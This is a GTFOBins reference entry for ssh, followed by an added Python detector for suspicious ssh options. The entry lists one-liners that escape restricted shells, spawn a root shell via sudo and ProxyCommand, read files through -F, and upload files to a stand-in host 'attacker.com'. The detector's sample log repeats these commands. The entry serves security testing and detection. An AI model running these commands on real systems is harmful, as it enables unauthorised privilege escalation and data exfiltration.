GTFOBins.github.io/_gtfobins/ssh.md
James Spadaro cd05b58e70
Add LocalCommand option to SSH
SSH has a LocalCommand option that will run a given command on the client machine after a successful connection.  It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes".  This is useful for bypassing restricted shells.

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-01 11:07:53 +02:00

---
functions:
  shell:
    - description: Reconnecting may help bypass restricted shells.
      code: ssh localhost $SHELL --noprofile --norc
    - description: Spawn interactive shell through ProxyCommand option.
      code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
    - description: Spawn interactive shell on client, requires a successful connection towards `host`.
      code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
  file-upload:
    - description: Send local file to an SSH server.
      code: |
        HOST=user@attacker.com
        RPATH=file_to_save
        LPATH=file_to_send
        ssh $HOST "cat > $RPATH" < $LPATH
  file-download:
    - description: Fetch a remote file from an SSH server.
      code: |
        HOST=user@attacker.com
        RPATH=file_to_get
        LPATH=file_to_save
        ssh $HOST "cat $RPATH" > $LPATH
  file-read:
    - description: The read file content is corrupted by error prints.
      code: |
        LFILE=file_to_read
        ssh -F $LFILE localhost
  sudo:
    - description: Spawn interactive root shell through ProxyCommand option.
      code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---
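
Detection logic for the option-based entries above, added here as an example and not part of the GTFOBins project: it flags logged `ssh` command lines that set `ProxyCommand`, set `LocalCommand` or `PermitLocalCommand=yes`, or point `-F` at an unexpected file, and marks the ones run under `sudo`. The sample lines are constructed from the entry; `ssh_findings`, `KNOWN_CONFIGS` and the finding labels are assumptions of this example.

```python
import os
import re
import shlex

# ssh_config keywords from the entry above that make the client run a local program.
EXEC_KEYWORDS = {"proxycommand", "localcommand"}
# Assumption: the only config files expected on this host.
KNOWN_CONFIGS = {"/etc/ssh/ssh_config", "~/.ssh/config"}
# Constructed sample: command lines as an execve audit source might record them.
SAMPLE_LOG = [
    "ssh -o ProxyCommand=';sh 0<&2 1>&2' x",
    "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x",
    "ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host",
    "ssh -F file_to_read localhost",
    "ssh -oStrictHostKeyChecking=yes deploy@build01",
]


def ssh_findings(cmdline):
    """Return sorted findings for one logged command line ([] if none)."""
    argv = shlex.split(cmdline)
    names = [os.path.basename(a) for a in argv]
    if "ssh" not in names:
        return []
    start = names.index("ssh")
    found, it = set(), iter(argv[start + 1:])
    for arg in it:
        opt = cfg = None
        if arg == "-o":
            opt = next(it, None)
        elif arg == "-F":
            cfg = next(it, None)
        elif arg.startswith("-o"):
            opt = arg[2:]
        elif arg.startswith("-F"):
            cfg = arg[2:]
        if opt:
            # ssh accepts "Key=Value" and "Key Value"; keywords are case-insensitive.
            key, _, val = re.sub(r"\s*=\s*|\s+", "=", opt.strip().lower(), count=1).partition("=")
            if (key in EXEC_KEYWORDS and val != "none") or (key, val) == ("permitlocalcommand", "yes"):
                found.add(key)
        if cfg and cfg not in KNOWN_CONFIGS:
            found.add("config-file:" + cfg)
    if found and "sudo" in names[:start]:
        found.add("via-sudo")
    return sorted(found)

for line in SAMPLE_LOG:
    print(ssh_findings(line), "<-", line)
```

`ProxyCommand` is also used legitimately (for example for jump hosts), so the findings are triage signals to weigh against the option value and the calling user.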